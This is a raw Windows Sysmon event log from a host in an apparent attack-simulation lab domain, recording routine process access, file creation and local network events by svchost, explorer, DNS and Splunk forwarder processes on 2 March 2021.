16:58:04.999{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245475Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:04.999{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245474Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:04.999{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6E9D-603E-13AB-00000000AD01}15660C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002245473Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:04.999{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6E9D-603E-13AB-00000000AD01}15660C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002245472Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:05.000{05ADC7E1-6E9D-603E-13AB-00000000AD01}15660C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000002245484Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:56.391{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60221-false10.0.1.12-8000- 23542300x80000000000000002245483Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:06.905{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D8AA76AC667388F89039503E6A60552,SHA256=BCB3B04407CC3BDC15B64026CEB560D9D0CBD67EE9392BAA9DDAEAA1B9ED315E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245482Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:06.030{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=30A1128FCD9372D5C74EDBE5F177E23D,SHA256=3352A055201AAD619E2EFA4E8DE7376F6DB7E25D3319EB0E034AF0B8887D0096,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245485Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:07.936{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3D9B83B6EDED8DBB78D2E74C129CCAE,SHA256=06FDBBD34AB30A9E401019B766275C2CB6C814C4290817675EFBC69A54095011,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245487Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:08.936{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7893D2FECCF40ACBEEFC05AA3377F08,SHA256=AA6B496FFDF9F829B792398F3787B2AFC8D23930A6B90A7A6EEDA9A71ABA72C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245486Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:08.881{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B5CC79DC90DEFDFDC60B50B04AC8B02C,SHA256=20C20BE26176619D008D2E4D943FF9D6E02DA066FCE688A52AAAA733F52046E9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245489Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:59.609{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local55608- 23542300x80000000000000002245488Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:09.952{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58E1ED075F0D8C5C5D7DB1F07F7FC359,SHA256=DB20097078779696B039D5E30EF9C948CF56660D911B79ABDC0AB74EEE470516,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245491Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:10.968{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8766985596F01C5A09355E0632C5C4B,SHA256=CB519962884CA04968B37A28E4CD07197C1790C8631741EA93AE9E05F99A5483,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245490Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:10.530{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4E8693D3010032785419791F918231B8,SHA256=F3CEA8978C563EEB5CBA9C5B89A1A4BE7A750894725A1323AED98DDCAEBAC699,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245492Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:11.968{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=965D9412F75E71C7DBBB80221731E86E,SHA256=A29D53ABD20E0AD1B4C14382FFEB4B58CEBC6780CE6D031E97F83D1469863AA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245497Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:12.987{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E398BB03550DA49E7C50A3748C5855E,SHA256=6FFC8A0E733A496311AB0AC47DE2DCBBF6DD194EA147E27526FEACEF95D87D32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245496Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:12.936{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=50353AB14CB1740A00F81A02DF5075F3,SHA256=4B112D70CF23946C66434CC4316FCBBD4FE1FA0DFF99E061D2965A9F943A1807,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245495Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:01.391{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60222-false10.0.1.12-8000- 354300x80000000000000002245494Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:00.625{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local55608- 23542300x80000000000000002245493Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:12.030{05ADC7E1-229F-6039-1100-00000000AD01}1152NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=E3F44381CB99E4EEC7D2579CBD5AED53,SHA256=C6084CC40E70A487100A2732842D5AA7491631FA79D1F6EE92868DEC9D86570F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245596Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.905{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AA91D85351D6B0AEB285D2E9ED29A3A,SHA256=B48C122A4140A6CE14BD82C66CF520A1344D723FE059D6D18EA1C8FEEDA0102C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002245595Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245594Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245593Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245592Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245591Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245590Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245589Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245588Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245587Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245586Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245585Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245584Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245583Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245582Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245581Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245580Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245579Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 